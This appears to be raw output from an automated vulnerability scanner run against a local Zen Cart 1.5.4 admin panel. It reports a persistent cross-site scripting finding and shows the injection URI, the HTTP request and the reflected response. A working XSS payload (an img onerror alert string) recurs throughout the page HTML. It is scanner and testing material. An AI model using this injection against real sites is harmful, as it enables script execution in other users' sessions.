                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=9">Stock</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=10">Logging</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=12">E-Mail Options</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=13">Attribute Settings</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=14">GZip Compression</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=15">Sessions</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=11">Regulations</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=16">GV Coupons</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=17">Credit Cards</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=18">Product Info</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=19">Layout Settings</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=20">Website Maintenance</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=21">New Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=22">Featured Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=23">All Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=24">Index Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=25">Define Page Status</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=30">EZ-Pages Settings</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Catalog</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/categories.php">Categories/Products</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/product_types.php">Product Types</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/products_price_manager.php">Products Price Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/options_name_manager.php">Option Name Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/options_values_manager.php">Option Value Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/attributes_controller.php">Attributes Controller</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/downloads_manager.php">Downloads Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/option_name.php">Option Name Sorter</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/option_values.php">Option Value Sorter </a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/manufacturers.php">Manufacturers</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/reviews.php">Reviews</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/specials.php">Specials</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/featured.php">Featured Products</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/salemaker.php">SaleMaker</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/products_expected.php">Products Expected</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Modules</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=payment">Payment</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=shipping">Shipping</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=ordertotal">Order Total</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Customers</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/customers.php">Customers</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/orders.php">Orders</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/group_pricing.php">Group Pricing</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Locations / Taxes</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/countries.php">Countries</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/zones.php">Zones</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php">Zones Definitions</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/tax_classes.php">Tax Classes</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/tax_rates.php">Tax Rates</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Localization</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/currencies.php">Currencies</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/languages.php">Languages</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/orders_status.php">Orders Status</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Reports</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_customers.php">Customer Orders-Total</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_customers_referrals.php">Customers Referral</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_products_lowstock.php">Products Low Stock</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_products_purchased.php">Products Purchased</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_products_viewed.php">Products Viewed</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Tools</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/template_select.php">Template Selection</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/layout_controller.php">Layout Boxes Controller</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/banner_manager.php">Banner Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/mail.php">Send Email</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/newsletters.php">Newsletter and Product Notifications Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/server_info.php">Server/Version Info</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/whos_online.php">Who's Online</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/store_manager.php">Store Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/developers_tool_kit.php">Developers Tool Kit</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/ezpages.php">EZ-Pages</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/define_pages_editor.php">Define Pages Editor</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/sqlpatch.php">Install SQL Patches</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Gift Certificate/Coupons</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/coupon_admin.php">Coupon Admin</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/gv_queue.php">Gift Certificates Queue</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/gv_mail.php">Mail Gift Certificate</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/gv_sent.php">Gift Certificates sent</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Admin Access Management</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/profiles.php">Admin Profiles</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/users.php">Admin Users</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/admin_page_registration.php">Admin Page Registration</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/admin_activity.php">Admin Activity Logs</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Extras</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/record_artists.php">Record Artists</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/record_company.php">Record Companies</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/music_genre.php">Music Genre</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/media_manager.php">Media Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/media_types.php">Media Types</a></li>
              </ul>
    </li>
      </ul>
</div>
  <table border="0" width="75%" cellspacing="0" cellpadding="0" align="center">
      <tr>
        <td width="100%">
           <table width="100%" border="0" cellspacing="0" cellpadding="2">
             <tr>
               <td height="40" valign="bottom">
                 <a href="http://localhost:8081/zen-cart/admin1/attributes_controller.php"><img src="includes/languages/english/images/buttons/button_edit_attribs.gif" border="0" alt="Edit Attributes" title=" Edit Attributes "></a> &nbsp;
                 <a href="http://localhost:8081/zen-cart/admin1/options_name_manager.php"><img src="includes/languages/english/images/buttons/button_option_names.gif" border="0" alt="Option Names Manager" title=" Option Names Manager "></a>
               </td>
              <td class="main" height="40" valign="bottom">
                <form name="set_option_names_values_copier_form" action="http://localhost:8081/zen-cart/admin1/options_values_manager.php" method="get">&nbsp;&nbsp;<select rel="dropdown" name="reset_option_names_values_copier" onChange="this.form.submit();">
<option value="0">Display Global Features - OFF</option>
<option value="1">Display Global Features - ON</option>
</select>
<input type="hidden" name="action" value="set_option_names_values_copier" /></form>              </td>
               <td class="main" align="right" valign="bottom">Edit Product Options for additional settings</td>
             </tr>
          </table>
       </td>
     </tr>
     <tr>
        <td valign="top" width="50%">
           <table width="100%" border="0" cellspacing="0" cellpadding="2">
<!-- value //-->
              <tr>
                <td colspan="3" class="pageHeading">&nbsp;Option Values&nbsp;</td>
              </tr>
              <tr>
                <td colspan="5" class="smallText">
<b><font color=red>1</font></b> |                 </td>
              </tr>
              <tr>
                <td colspan="6"><img src="images/pixel_black.gif" border="0" alt="" width="100%" height="1"></td>
              </tr>
              <tr class="dataTableHeadingRow">
                <td class="dataTableHeadingContent">&nbsp;ID&nbsp;</td>
                <td class="dataTableHeadingContent">&nbsp;Option Name&nbsp;</td>
                <td class="dataTableHeadingContent">&nbsp;Option Value&nbsp;</td>
                <td class="dataTableHeadingContent" align="right">&nbsp;Default Order</td>
                <td class="dataTableHeadingContent" align="center">&nbsp;Action&nbsp;</td>
              </tr>
              <tr>
                <td colspan="6"><img src="images/pixel_black.gif" border="0" alt="" width="100%" height="1"></td>
              </tr>
              <tr class="attributes-odd">
                <td align="center" class="smallText">&nbsp;3&nbsp;</td>
                <td align="center" class="smallText">&nbsp;admin&nbsp;</td>
                <td class="smallText">&nbsp;admin&nbsp;</td>
                <td class="smallText" align="right">132312</td>
<!--                <td align="center" class="smallText">&nbsp;<a href="http://localhost:8081/zen-cart/admin1/options_values_manager.php?action=update_option_value&value_id=3&value_page=1"><img src="includes/languages/english/images/buttons/button_edit.gif" border="0" alt="Update" title=" Update "></a>&nbsp;&nbsp;<a href="http://localhost:8081/zen-cart/admin1/options_values_manager.php?action=delete_option_value&value_id=3&option_id=0"><img src="includes/languages/english/images/buttons/button_delete.gif" border="0" alt="Delete" title=" Delete "></a>&nbsp;</td> -->
                <td align="center" class="smallText">&nbsp;<a href="http://localhost:8081/zen-cart/admin1/options_values_manager.php?action=update_option_value&value_id=3&value_page=1"><img src="includes/languages/english/images/buttons/button_edit.gif" border="0" alt="Update" title=" Update "></a>&nbsp;&nbsp;<a href="http://localhost:8081/zen-cart/admin1/options_values_manager.php?action=delete_option_value&value_id=3&value_page=1"><img src="includes/languages/english/images/buttons/button_delete.gif" border="0" alt="Delete" title=" Delete "></a>&nbsp;</td>
              <tr class="attributes-even">
                <td align="center" class="smallText">&nbsp;1&nbsp;</td>
                <td align="center" class="smallText">&nbsp;admin&nbsp;</td>
                <td class="smallText">&nbsp;admin&nbsp;</td>
                <td class="smallText" align="right">132312</td>
<!--                <td align="center" class="smallText">&nbsp;<a href="http://localhost:8081/zen-cart/admin1/options_values_manager.php?action=update_option_value&value_id=1&value_page=1"><img src="includes/languages/english/images/buttons/button_edit.gif" border="0" alt="Update" title=" Update "></a>&nbsp;&nbsp;<a href="http://localhost:8081/zen-cart/admin1/options_values_manager.php?action=delete_option_value&value_id=1&option_id=0"><img src="includes/languages/english/images/buttons/button_delete.gif" border="0" alt="Delete" title=" Delete "></a>&nbsp;</td> -->
                <td align="center" class="smallText">&nbsp;<a href="http://localhost:8081/zen-cart/admin1/options_values_manager.php?action=update_option_value&value_id=1&value_page=1"><img src="includes/languages/english/images/buttons/button_edit.gif" border="0" alt="Update" title=" Update "></a>&nbsp;&nbsp;<a href="http://localhost:8081/zen-cart/admin1/options_values_manager.php?action=delete_option_value&value_id=1&value_page=1"><img src="includes/languages/english/images/buttons/button_delete.gif" border="0" alt="Delete" title=" Delete "></a>&nbsp;</td>
              <tr class="attributes-odd">
                <td align="center" class="smallText">&nbsp;2&nbsp;</td>
                <td align="center" class="smallText">&nbsp;admin&nbsp;</td>
                <td class="smallText">&nbsp;admin&nbsp;</td>
                <td class="smallText" align="right">132312</td>
<!--                <td align="center" class="smallText">&nbsp;<a href="http://localhost:8081/zen-cart/admin1/options_values_manager.php?action=update_option_value&value_id=2&value_page=1"><img src="includes/languages/english/images/buttons/button_edit.gif" border="0" alt="Update" title=" Update "></a>&nbsp;&nbsp;<a href="http://localhost:8081/zen-cart/admin1/options_values_manager.php?action=delete_option_value&value_id=2&option_id=0"><img src="includes/languages/english/images/buttons/button_delete.gif" border="0" alt="Delete" title=" Delete "></a>&nbsp;</td> -->
                <td align="center" class="smallText">&nbsp;<a href="http://localhost:8081/zen-cart/admin1/options_values_manager.php?action=update_option_value&value_id=2&value_page=1"><img src="includes/languages/english/images/buttons/button_edit.gif" border="0" alt="Update" title=" Update "></a>&nbsp;&nbsp;<a href="http://localhost:8081/zen-cart/admin1/options_values_manager.php?action=delete_option_value&value_id=2&value_page=1"><img src="includes/languages/english/images/buttons/button_delete.gif" border="0" alt="Delete" title=" Delete "></a>&nbsp;</td>
              <tr class="attributes-even">
                <td align="center" class="smallText">&nbsp;4&nbsp;</td>
                <td align="center" class="smallText">&nbsp;admin&nbsp;</td>
                <td class="smallText">&nbsp;admin<! XSS="><img src=xx:x onerror=alert(14507304.25907)//">&nbsp;</td>
                <td class="smallText" align="right">132312</td>
<!--                <td align="center" class="smallText">&nbsp;<a href="http://localhost:8081/zen-cart/admin1/options_values_manager.php?action=update_option_value&value_id=4&value_page=1"><img src="includes/languages/english/images/buttons/button_edit.gif" border="0" alt="Update" title=" Update "></a>&nbsp;&nbsp;<a href="http://localhost:8081/zen-cart/admin1/options_values_manager.php?action=delete_option_value&value_id=4&option_id=0"><img src="includes/languages/english/images/buttons/button_delete.gif" border="0" alt="Delete" title=" Delete "></a>&nbsp;</td> -->
                <td align="center" class="smallText">&nbsp;<a href="http://localhost:8081/zen-cart/admin1/options_values_manager.php?action=update_option_value&value_id=4&value_page=1"><img src="includes/languages/english/images/buttons/button_edit.gif" border="0" alt="Update" title=" Update "></a>&nbsp;&nbsp;<a href="http://localhost:8081/zen-cart/admin1/options_values_manager.php?action=delete_option_value&value_id=4&value_page=1"><img src="includes/languages/english/images/buttons/button_delete.gif" border="0" alt="Delete" title=" Delete "></a>&nbsp;</td>
              </tr>
              <tr>
                <td colspan="5"><img src="images/pixel_black.gif" border="0" alt="" width="100%" height="1"></td>
              </tr>
              <tr class="attributes-even">
<form name="values" action="http://localhost:8081/zen-cart/admin1/options_values_manager.php?action=add_product_option_values&value_page=1" method="post"><input type="hidden" name="securityToken" value="f30ffae6475aa7c037f703d7983c8eff" />                <td align="center" class="smallText">&nbsp;5&nbsp;</td>
                <td align="center" class="smallText">&nbsp;<select name="option_id">
                </select>&nbsp;</td>
                <td class="smallText"><input type="hidden" name="value_id" value="5">te:&nbsp;<input type="text" name="value_name[2]" size = "51" maxlength= "64">&nbsp;<br />en:&nbsp;<input type="text" name="value_name[1]" size = "51" maxlength= "64">&nbsp;<br /></td>
                <td colspan="1" class="smallText"><input type="hidden" name="value_id" value="5"> Order: <input type="text" name="products_options_values_sort_order" size="4">&nbsp;</td>
                <td align="center" class="smallText">&nbsp;<input type="image" src="includes/languages/english/images/buttons/button_insert.gif" border="0" alt="Insert" title=" Insert ">&nbsp;</td>
</form>              </tr>
              <tr>
                <td colspan="5"><img src="images/pixel_black.gif" border="0" alt="" width="100%" height="1"></td>
              </tr>
            </td>
          </tr>



<input type="hidden" name="option_value_from_filter" /><input type="hidden" name="option_value_from_filter" /><input type="hidden" name="option_value_from_filter" /><input type="hidden" name="option_value_from_filter" />
<!--
bof: copy Option Name and Value From to Option Name and Value to - all products
example: Copy Color Red to products with Size Small
-->

            <tr>
              <td colspan="5"><img src="images/pixel_black.gif" border="0" alt="" width="100%" height="10"></td>
            </tr>
            <tr>
              <td class="main" colspan="4"><strong>Copy to ALL Products where Option Name and Value ...</strong></td>
              <td class="main" colspan="1"> </td>
            </tr>
            <tr>
              <td class="main" colspan="4">Select an Option Name and Value that currently exists on a product or products that you then want to copy another Option Name and Value to for all products with this existing Option Name and Value</td>
              <td class="main" colspan="1"> </td>
            </tr>
            <tr class="dataTableHeadingRow">
              <td colspan="5"><table border="1" cellspacing="0" cellpadding="2" width="100%">
                <tr class="dataTableHeadingRow">
                  <form name="quick_jump" method="post" action="http://localhost:8081/zen-cart/admin1/options_values_manager.php?action=copy_options_values_one_to_another"><input type="hidden" name="securityToken" value="f30ffae6475aa7c037f703d7983c8eff" />                  <td class="dataTableHeadingContent">
                  Option Name to match:<br />
<select name="options_id_from">
</select>&nbsp;<br />Option Value to match:<br />
<select name="options_values_values_id_from">
  <option name="admin" value="1">admin&nbsp;&nbsp;&nbsp;[ADMIN]</option>
  <option name="admin" value="2">admin&nbsp;&nbsp;&nbsp;[ADMIN]</option>
  <option name="admin" value="3">admin&nbsp;&nbsp;&nbsp;[ADMIN]</option>
  <option name="admin<! XSS="><img src=xx:x onerror=alert(14507304.25907)//">" value="4">admin<! XSS="><img src=xx:x onerror=alert(14507304.25907)//">&nbsp;&nbsp;&nbsp;[ADMIN]</option>
</select>&nbsp;
                  </td>
                  <td class="dataTableHeadingContent">
                  Option Name to add:<br />
<select name="options_id_to">
</select>&nbsp<br />Option Value to add:<br />
<select name="options_values_values_id_to">
  <option name="admin" value="1">admin&nbsp;&nbsp;&nbsp;[ADMIN]</option>
  <option name="admin" value="2">admin&nbsp;&nbsp;&nbsp;[ADMIN]</option>
  <option name="admin" value="3">admin&nbsp;&nbsp;&nbsp;[ADMIN]</option>
  <option name="admin<! XSS="><img src=xx:x onerror=alert(14507304.25907)//">" value="4">admin<! XSS="><img src=xx:x onerror=alert(14507304.25907)//">&nbsp;&nbsp;&nbsp;[ADMIN]</option>
</select>&nbsp;
                  </td>
                  <td class="dataTableHeadingContent">Leave blank for ALL Products or<br />enter a Category ID for Products to update<br />&nbsp;<input type="text" name="copy_to_categories_id" size="4">&nbsp;&nbsp;</td>
                  <td align="center" class="dataTableHeadingContent">&nbsp;<input type="image" src="includes/languages/english/images/buttons/button_insert.gif" border="0" alt="Insert" title=" Insert ">&nbsp;</td>
                  </form>
                </tr>
              </table></td>
            </tr>
<!-- eof: copy all option values to another Option Name -->


<!--
bof: delete all Option Name for an Value
example: Delete Color Red
-->

            <tr>
              <td colspan="5"><img src="images/pixel_black.gif" border="0" alt="" width="100%" height="10"></td>
            </tr>
            <tr>
              <td class="main" colspan="4"><strong>Delete Matching Attribute from ALL Products where Option Name and Value ...</strong></td>
              <td class="main" colspan="1"> </td>
            </tr>
            <tr>
              <td class="main" colspan="4">Select an Option Name and Value that currently exists on a product or products that you want deleted from ALL Products or from ALL Products within one Category</td>
              <td class="main" colspan="1"> </td>
            </tr>
            <tr class="dataTableHeadingRow">
              <td colspan="5"><table border="1" cellspacing="0" cellpadding="2" width="100%">
                <tr class="dataTableHeadingRow">
                  <form name="quick_jump" method="post" action="http://localhost:8081/zen-cart/admin1/options_values_manager.php?action=delete_options_values_of_option_name"><input type="hidden" name="securityToken" value="f30ffae6475aa7c037f703d7983c8eff" />                  <td class="dataTableHeadingContent">
                  Option Name to match:<br />
<select name="options_id_from">
</select>&nbsp;<br />Option Value to match:<br />
<select name="options_values_values_id_from">
  <option name="admin" value="1">admin&nbsp;&nbsp;&nbsp;[ADMIN]</option>
  <option name="admin" value="2">admin&nbsp;&nbsp;&nbsp;[ADMIN]</option>
  <option name="admin" value="3">admin&nbsp;&nbsp;&nbsp;[ADMIN]</option>
  <option name="admin<! XSS="><img src=xx:x onerror=alert(14507304.25907)//">" value="4">admin<! XSS="><img src=xx:x onerror=alert(14507304.25907)//">&nbsp;&nbsp;&nbsp;[ADMIN]</option>
</select>&nbsp;
                  </td>
                  <td class="dataTableHeadingContent">Leave blank for ALL Products or<br />enter a Category ID for Products to update<br />&nbsp;<input type="text" name="copy_to_categories_id" size="4">&nbsp;&nbsp;</td>
                  <td align="center" class="dataTableHeadingContent">&nbsp;<input type="image" src="includes/languages/english/images/buttons/button_delete.gif" border="0" alt="Delete" title=" Delete ">&nbsp;</td>
                  </form>
                </tr>
              </table></td>
            </tr>
<!-- eof: delete all matching option name for option values -->


<!--
bof: copy Option Name and Value From to Option Name and Value to - all products
example: Copy Color Red to products with Size Small
-->

            <tr>
              <td colspan="5"><img src="images/pixel_black.gif" border="0" alt="" width="100%" height="10"></td>
            </tr>
            <tr>
              <td class="main" colspan="4"><strong>Copy Option Name/Value to Products with existing Option Name ...</strong></td>
              <td class="main" colspan="1"> </td>
            </tr>
            <tr>
              <td class="main" colspan="4">Select an Option Name and Value that currently exists on a product or products to add to all products or to only the products in the selected category that have the selected Option Name.
                                                   <br /><strong>Example:</strong> Add Option Name: Color Option Value: Red to all Products with Option Name: Size
                                                   <br /><strong>Example:</strong> Add Option Name: Color Option Value: Green with default values from Products ID: 34 to all Products with Option Name: Size
                                                   <br /><strong>Example:</strong> Add Option Name: Color Option Value: Green with default values from Products ID: 34 to all Products with Option Name: Size for Categories ID: 65
        </td>
              <td class="main" colspan="1"> </td>
            </tr>
            <tr class="dataTableHeadingRow">
              <td colspan="5"><table border="1" cellspacing="0" cellpadding="2" width="100%">
                <tr class="dataTableHeadingRow">
                  <form name="quick_jump" method="post" action="http://localhost:8081/zen-cart/admin1/options_values_manager.php?action=copy_options_values_one_to_another_options_id"><input type="hidden" name="securityToken" value="f30ffae6475aa7c037f703d7983c8eff" />                  <td class="dataTableHeadingContent" valign="top">
                  Option Name to add:<br />
<select name="options_id_from">
</select>&nbsp;<br />Option Value to add:<br />
<select name="options_values_values_id_from">
  <option name="admin" value="1">admin&nbsp;&nbsp;&nbsp;[ADMIN]</option>
  <option name="admin" value="2">admin&nbsp;&nbsp;&nbsp;[ADMIN]</option>
  <option name="admin" value="3">admin&nbsp;&nbsp;&nbsp;[ADMIN]</option>
  <option name="admin<! XSS="><img src=xx:x onerror=alert(14507304.25907)//">" value="4">admin<! XSS="><img src=xx:x onerror=alert(14507304.25907)//">&nbsp;&nbsp;&nbsp;[ADMIN]</option>
</select>&nbsp;<br /><br />Default New Attribute Values from Product ID# or leave blank for no default values:&nbsp;<input type="text" name="copy_from_products_id" size="4">&nbsp;&nbsp;
                  </td>
                  <td class="dataTableHeadingContent" valign="top">
                  Option Name to add to:<br />
<select name="options_id_to">
</select>&nbsp;
                  </td>
                  <td class="dataTableHeadingContent" valign="top">
                  Leave blank for ALL Products or<br />enter a Category ID for Products to update<br />&nbsp;<input type="text" name="copy_to_categories_id" size="4">&nbsp;<br /><strong>How should existing product attributes be handled?</strong><br /><input type="radio" name="copy_attributes" value="copy_attributes_update" /> <strong>Update</strong> existing attributes with new settings/prices<br /><input type="radio" name="copy_attributes" value="copy_attributes_ignore" checked="checked" /> <strong>Ignore</strong> existing attributes and add only new attributes&nbsp;</td>
                  <td align="center" class="dataTableHeadingContent" valign="top">&nbsp;<input type="image" src="includes/languages/english/images/buttons/button_insert.gif" border="0" alt="Insert" title=" Insert ">&nbsp;</td>
                  </form>
                </tr>
              </table></td>
            </tr>
<!-- eof: copy all option values to another Option Name -->

        </table>
</td></tr></table>
<!-- option value eof //-->

<!-- body_text_eof //-->
<!-- footer //-->
<table border="0" width="100%" cellspacing="10" cellpadding="10">
  <tr>
    <td align="center" class="smallText" height="100" valign="bottom"><a href="http://www.zen-cart.com" target="_blank"><img src="images/small_zen_logo.gif" alt="Zen Cart:: the art of e-commerce" border="0"></a><br /><br />E-Commerce Engine Copyright &copy; 2003-2015 <a href="http://www.zen-cart.com" target="_blank">Zen Cart&reg;</a><br /><a href="http://localhost:8081/zen-cart/admin1/server_info.php">Zen Cart v1.5.4/v1.5.4</a></td>
  </tr>
</table>
<!-- footer_eof //-->
</body>
</html>

Finding 3.48: Persistent Cross-Site Scripting.

Current injection value: update_product<! XSS="><img src=xx:x onerror=alert(14507304.47607)//">

Injection URI: http://localhost:8081/zen-cart/admin1/attributes_controller.php?action=delete_option_name_values_confirm&products_options_id_all=2&attribute_page=1&products_filter=2&current_category_id=0&<!+XSS="><img+src=xx:x+onerror=alert(14507304.47657)//">
Injected item: GET : CENZIC_DUMMY_PARAM
Injection value: <!+XSS="><img+src=xx:x+onerror=alert(14507304.47657)//">

Reflection URI: http://localhost:8081/zen-cart/admin1/option_values.php?action=update_product<! XSS="><img src=xx:x onerror=alert(14507304.47607)//">
Detection string: alert(14507304.47657)

HTTP Request
POST /zen-cart/admin1/option_values.php?action=update_product<! XSS="><img src=xx:x onerror=alert(14507304.47607)//"> HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/option_values.php
Cookie: zenAdminID=qj17gn2vluuq7iknle1aefn3r3
Content-Type: application/x-www-form-urlencoded
Content-Length: 87

products_update_id=&securityToken=f30ffae6475aa7c037f703d7983c8eff&products_update_id=3


HTTP Response
HTTP/1.1 200 OK
Date: Mon, 21 Dec 2015 22:49:20 GMT
Server: Apache
X-Powered-By: PHP/5.4.37
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

<!doctsype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="ltr" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Zen Cart!</title>
<link rel="stylesheet" type="text/css" href="includes/stylesheet.css">
<link rel="stylesheet" type="text/css" href="includes/cssjsmenuhover.css" media="all" id="hoverJS">
<script language="javascript" src="includes/menu.js"></script>
<script language="javascript" src="includes/general.js"></script>
<script type="text/javascript">
  <!--
  function init()
  {
    cssjsmenu('navbar');
    if (document.getElementById)
    {
      var kill = document.getElementById('hoverJS');
      kill.disabled = true;
    }
  }
  // -->
</script>
</head>
<body onload="init()" marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0" bgcolor="#FFFFFF">
<!-- header //-->
<table border="0" width="100%" cellspacing="0" cellpadding="2">
  <tr class="messageStackSuccess">
    <td class="messageStackSuccess"><img src="images/icons/success.gif" border="0" alt="Success" title=" Success ">&nbsp;Successful Attribute Sort Order Update for ID# 3<! XSS="><img src=xx:x onerror=alert(14507304.47657)//"> admin</td>
  </tr>
  <tr class="messageStackCaution">
    <td class="messageStackCaution"><img src="images/icons/warning.gif" border="0" alt="Warning" title=" Warning ">&nbsp;MISSING LANGUAGE FILES OR DIRECTORIES ... Testval admin</td>
  </tr>
</table>
<!-- All HEADER_ definitions in the columns below are defined in includes/languages/english.php //-->
<table border="0" width="100%" cellspacing="0" cellpadding="0" class="header">
  <tr>
    <td align="left" valign="top" height="70px" width="200px"><a href="http://localhost:8081/zen-cart/admin1/index.php"><img src="images/logo.gif" border="0" alt="Admin Powered by Zen Cart :: The Art of E-Commerce" title=" Admin Powered by Zen Cart :: The Art of E-Commerce "></a></td>
    <td colspan="2" align="left"><table width="100%"><tr>
    <td align="left" class="main" valign="top"></td>
    <td align="right" class="main" valign="top"><a href="http://localhost:8081/zen-cart/admin1/option_values.php?action=update_productXSSimgsrcxxxonerroralert1450730447607&vcheck=yes"><img src="includes/languages/english/images/buttons/button_check_new_version.gif" border="0" alt="Check for Updates to Zen Cart" title=" Check for Updates to Zen Cart "></a><br />(You are presently using:  v1.5.4)</td>
    </tr></table></td>
  </tr>
</table>
<table border="0" cellspacing="0" cellpadding="0" width="100%">
  <tr class="headerBar">

    <td class="headerBarContent" align="left">
      <form name="languages" action="http://localhost:8081/zen-cart/admin1/option_values.php" method="get">Define Language:&nbsp;&nbsp;<select rel="dropdown" name="language" onChange="this.form.submit();">
<option value="en" selected="selected">admin</option>
</select>
</form>    </td>
    <td class="headerBarContent" align="center">
Monday 21 Dec 2015 10:49:21 PM&nbsp;+0000 GMT&nbsp;[::1]<br />CMP-SL-73CF1 - Europe/London - English_United States.1252</td>

    <td class="headerBarContent" align="right">
        <a href="http://localhost:8081/zen-cart/admin1/index.php" class="headerLink">Admin Home</a>&nbsp;|&nbsp;
        <a href="http://localhost:8081/zen-cart/index.php?main_page=" class="headerLink" target="_blank">Online Catalog</a>&nbsp;|&nbsp;
        <a href="http://www.zen-cart.com/" class="headerLink" target="_blank">Support Site</a>&nbsp;|&nbsp;
